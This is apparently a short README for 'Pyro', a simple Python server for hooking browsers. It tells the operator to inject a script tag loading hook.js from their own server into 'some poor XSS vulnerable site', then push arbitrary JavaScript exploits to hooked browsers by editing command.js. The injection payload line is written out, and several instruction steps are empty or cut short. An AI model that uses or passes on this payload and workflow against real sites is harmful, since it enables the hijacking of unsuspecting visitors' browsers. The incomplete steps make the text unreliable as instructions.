Pyro was designed to be the simplest possible hooking server to serve as a demonstation and a starting point for more serious developement.
To start using Pyro you require no external packages! Most modern python installations should work fine!
To run: ./
You may want to edit the 'command.js' as it will not work until it has a different md5 hash from when the server started. So
Step 1)
Step 2)
inject '<script src='http://yourserver.domain:port/hook.js'></script>
into some poor XSS vulnerable site, and have it run in a browser
Step 3)
while the client asks for commands
edit command.js with your favourite js exploit
Step 4)
Make sure that the hook.js and command.js is in the same path as and if you'd like to use the hooktest.js make sure to place it there too.
Enjoy! and happy hooking! Thanks to k3170makan
Download - command.js
Source -
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